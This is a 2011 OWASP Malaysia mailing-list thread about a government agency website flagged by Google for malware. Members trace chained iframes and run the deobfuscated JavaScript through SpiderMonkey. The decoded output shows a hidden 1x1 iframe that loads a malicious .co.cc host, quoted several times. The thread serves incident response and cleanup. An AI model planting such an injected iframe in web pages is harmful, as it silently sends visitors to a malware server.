[Owasp-Malaysia] Malware Detected!

najmi.zabidi at gmail.com
Tue Feb 8 21:42:48 EST 2011


Posted here last year ;)

https://lists.owasp.org/pipermail/owasp-malaysia/2010-September/000539.html



On Wed, Feb 9, 2011 at 10:37 AM, Adnan bin Mohd Shukor
<adnan.shukor at gmail.com> wrote:
> Hi,
>
> For further action :)
>
> http://25yearsofprogramming.com/blog/20070705.htm
>
> Thanks
>
> On 9 February 2011 10:36, Rasta Boy <rastaboyz at gmail.com> wrote:
>> Syamsuri, nice to hear that. Can you share your blog address?
>>
>> Adnan good work. Hope to learn more from you.
>>
>> On Wed, Feb 9, 2011 at 6:53 AM, Mohd Syamsuri <msyamsuri at gmail.com> wrote:
>>>
>>> Mr Adnan, thanks for the info and guide..
>>>
>>> I have cleaned up all the mess and the site is up and running again..
>>>
>>> thanks to all too..
>>>
>>> ** I will blog this so others can use it as a guide...
>>>
>>> On Tue, Feb 8, 2011 at 6:00 PM, Adnan bin Mohd Shukor
>>> <adnan.shukor at gmail.com> wrote:
>>>>
>>>> mamp <= LOL typo.. it should be nano
>>>> js <= one of the binaries in SpiderMonkey. Get the patched version from
>>>> http://blog.didierstevens.com/programs/spidermonkey/ and, if you are
>>>> working on MacOS/Darwin, apply this patch:
>>>>
>>>> http://blog.xanda.org/2010/10/15/fix-for-spidermonkey-build-issue-in-darwin/
>>>>
>>>> thanks
>>>>
>>>> On 8 February 2011 17:56, Sharuzzaman Ahmat Raslan
>>>> <sharuzzaman at gmail.com> wrote:
>>>> > I can see 2 interesting apps/scripts:
>>>> >
>>>> > 1. mamp
>>>> > 2. /opt/analysis/js/js
>>>> >
>>>> > Care to share? Hopefully it is open source ;)
>>>> >
>>>> >
>>>> > On Tue, Feb 8, 2011 at 5:50 PM, Adnan bin Mohd Shukor
>>>> > <adnan.shukor at gmail.com> wrote:
>>>> >>
>>>> >> Here is my bash history:
>>>> >>
>>>> >> xanda:tmp adnan$ history
>>>> >> <snip>
>>>> >>  500  cd /tmp
>>>> >>  501  wget http:/www2.pkink.gov.my/indexsedc.php
>>>> >>  502  wget http://www2.pkink.gov.my/indexsedc.php
>>>> >>  503  nano indexsedc.php
>>>> >>  504  wget http://www2.pkink.gov.my/indexsedc.php
>>>> >>  505  mamp indexsedc.php.1
>>>> >>  506  nano indexsedc.php.1
>>>> >>  507  wget http://www2.pkink.gov.my/sedc.php
>>>> >>  508  nano sedc.php
>>>> >>  509  wget http://www2.pkink.gov.my/default.php
>>>> >>  510  nano default.php
>>>> >>  511  nano default.php
>>>> >>  512  clear
>>>> >> <I've removed the tags and left clean JavaScript inside>
>>>> >>  513  mv default.php default.txt
>>>> >>  514  /opt/analysis/js/js < default.txt
>>>> >>  515  cat write.log
>>>> >>  516  history
>>>> >> xanda:tmp adnan$
>>>> >>
>>>> >> Below is the output of the cat:
>>>> >> [output]
>>>> >> xanda:tmp adnan$ cat write.log
>>>> >> <iframe width="1" height="1" src="http://asfiuweof.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAgAGBQUBDA=="></iframe>"<iframe width="1" height="1" src="http://asfiuweof.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAgAGBQUBDA=="></iframe>"
>>>> >> [/output]
>>>> >>
>>>> >>
>>>> >> Hint: you might use a modified version of SpiderMonkey to 'understand'
>>>> >> the JavaScript
>>>> >>
>>>> >> Thanks
>>>> >>
>>>> >> On 8 February 2011 17:38, Mohd Syamsuri <msyamsuri at gmail.com> wrote:
>>>> >> > thanks for the info..
>>>> >> > i will check all the files.
>>>> >> >
>>>> >> > how did you find it?
>>>> >> >
>>>> >> > On Tue, Feb 8, 2011 at 5:21 PM, Adnan bin Mohd Shukor
>>>> >> > <adnan.shukor at gmail.com> wrote:
>>>> >> >>
>>>> >> >> Here is the flow:
>>>> >> >>
>>>> >> >> 1) your indexsedc.php has an iframe to sedc.php
>>>> >> >> 2) and your sedc.php has an iframe to default.php
>>>> >> >> 3) and in default.php (look at the last 2 lines), javascript will
>>>> >> >> actually create an iframe to
>>>> >> >> asfiuweof.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAgAGBQUBDA==
>>>> >> >>
>>>> >> >> thanks :)
>>>> >> >>
>>>> >> >> On 8 February 2011 17:07, Mohd Syamsuri <msyamsuri at gmail.com>
>>>> >> >> wrote:
>>>> >> >> > can you point...
>>>> >> >> > my index.htm or indexsedc.php or other file?
>>>> >> >> >
>>>> >> >> > On Tue, Feb 8, 2011 at 4:19 PM, Adnan bin Mohd Shukor
>>>> >> >> > <adnan.shukor at gmail.com> wrote:
>>>> >> >> >>
>>>> >> >> >> you have an iframe pointed to
>>>> >> >> >> asfiuweof.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAgAGBQUBDA==
>>>> >> >> >>
>>>> >> >> >> which is not XSS :)
>>>> >> >> >>
>>>> >> >> >> From my personal point of view, it's either caused by:
>>>> >> >> >> 1) malware on a PC which has been used for FTP/access to the
>>>> >> >> >> server
>>>> >> >> >> 2) a compromised server
>>>> >> >> >>
>>>> >> >> >> you can send your access.log to cyber999 at cybersecurity.my or
>>>> >> >> >> mycert at mycert.org.my for further analysis :)
>>>> >> >> >>
>>>> >> >> >> thanks
>>>> >> >> >>
>>>> >> >> >> On 8 February 2011 16:00, Mohd Syamsuri <msyamsuri at gmail.com>
>>>> >> >> >> wrote:
>>>> >> >> >> > I have checked it.
>>>> >> >> >> > On Tue, Feb 8, 2011 at 3:49 PM, Rasta Boy
>>>> >> >> >> > <rastaboyz at gmail.com>
>>>> >> >> >> > wrote:
>>>> >> >> >> >>
>>>> >> >> >> >> Hi Mohd Syamsuri,
>>>> >> >> >> >>
>>>> >> >> >> >> Why don't you check on the reason why it's being blocked; it
>>>> >> >> >> >> might help.
>>>> >> >> >> >>
>>>> >> >> >> >> http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=en-US&site=http://www.pkink.gov.my/
>>>> >> >> >> >>
>>>> >> >> >> >> http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=en-US&site=AS:4788
>>>> >> >> >> >>
>>>> >> >> >> >> Regards,
>>>> >> >> >> >> Kishur
>>>> >> >> >> >>
>>>> >> >> >> >>
>>>> >> >> >> >>
>>>> >> >> >> >> On Tue, Feb 8, 2011 at 3:19 PM, Mohd Syamsuri
>>>> >> >> >> >> <msyamsuri at gmail.com>
>>>> >> >> >> >> wrote:
>>>> >> >> >> >>>
>>>> >> >> >> >>> Assalamualaikum and good day to my fellow friends.
>>>> >> >> >> >>> I need some advice.
>>>> >> >> >> >>> The web site of Perbadanan Kemajuan Iktisad Negeri Kelantan
>>>> >> >> >> >>> (http://www.pkink.gov.my) has been blocked by Google for almost
>>>> >> >> >> >>> 4 days.
>>>> >> >> >> >>> It said that we host malware on our server: "Malware Detected!"
>>>> >> >> >> >>> (Google said that!!)
>>>> >> >> >> >>> What I did is..
>>>> >> >> >> >>> 1. Scan all the data and upload new data
>>>> >> >> >> >>> 2. Check the index.html or index.php
>>>> >> >> >> >>> 3. Scan using a web scanner:
>>>> >> >> >> >>> http://www.avgthreatlabs.com/
>>>> >> >> >> >>> http://www.virustotal.com
>>>> >> >> >> >>> but still get blocked..
>>>> >> >> >> >>> Google said: Suspected injected code
>>>> >> >> >> >>> <FRAME SRC="http://www2.pkink.gov.my/indexsedc.php" NAME="confcontent" scrolling=yes >
>>>> >> >> >> >>> I have been using this code for almost 2 years.
>>>> >> >> >> >>> What should I do now?
>>>> >> >> >> >>>
>>>> >> >> >> >>> --
>>>> >> >> >> >>> best regard
>>>> >> >> >> >>> syamsuri
>>>> >> >> >> >>>
>>>> >> >> >> >>>
>>>> >> >> >> >>>
>>>> >> >> >> >>> _______________________________________________
>>>> >> >> >> >>> Owasp-Malaysia mailing list
>>>> >> >> >> >>> Owasp-Malaysia at lists.owasp.org
>>>> >> >> >> >>> https://lists.owasp.org/mailman/listinfo/owasp-malaysia
>>>> >> >> >> >>>
>>>> >> >> >> >>> OWASP Malaysia Wiki
>>>> >> >> >> >>> http://www.owasp.org/index.php/Malaysia
>>>> >> >> >> >>>
>>>> >> >> >> >>> OWASP Malaysia Wiki Facebook
>>>> >> >> >> >>> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
>>>> >> >> >> >
>>>> >> >> >> >
>>>> >> >> >> >
>>>> >> >> >> > --
>>>> >> >> >> > best regard
>>>> >> >> >> > syamsuri
>>>> >> >> >
>>>> >> >> >
>>>> >> >> >
>>>> >> >> > --
>>>> >> >> > best regard
>>>> >> >> > syamsuri
>>>> >> >
>>>> >> >
>>>> >> >
>>>> >> > --
>>>> >> > best regard
>>>> >> > syamsuri
>>>> >
>>>> >
>>>> >
>>>> > --
>>>> > Sharuzzaman Ahmat Raslan
>>>
>>>
>>>
>>> --
>>> best regard
>>> syamsuri
>>
>

